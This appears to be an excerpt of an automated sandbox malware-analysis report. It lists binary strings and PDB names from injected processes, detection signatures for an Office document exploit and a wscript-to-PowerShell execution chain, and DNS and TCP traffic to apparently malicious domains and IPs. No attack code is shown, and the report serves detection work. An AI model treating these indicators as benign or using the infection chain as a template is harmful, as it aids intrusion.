Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: egbrowsers.pdb source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: aspnet_regbrowsers.pdbl source: explorer.exe, 00000017.00000002.639143250.000000000878F000.00000004.80000000.00040000.00000000.sdmp, niLILOT.exe, 00000019.00000000.488929503.0000000000332000.00000020.00000001.01000000.0000000A.sdmp, mstsc.exe, 0000001B.00000002.638080396.00000000026CF000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637568604.000000000037D000.00000004.00000020.00020000.00000000.sdmp, niLILOT.exe.17.dr
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: egbrowsers.pdbd source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_009120E2 PathFindFileNameW,PathAppendW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,FindNextFileW,PathAppendW,FindNextFileW,FindClose, 27_2_009120E2

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Suspicious execution chain found
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 4x nop then jmp 007D1A1Ch 17_2_007D117E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 4x nop then pop edi 27_2_0008E47D
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: raw.githubusercontent.com
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: raw.githubusercontent.com
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: m2g.me
Source: global traffic DNS query: name: www.my-tournament.live
Source: global traffic DNS query: name: www.senior-dating-73474.bond
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
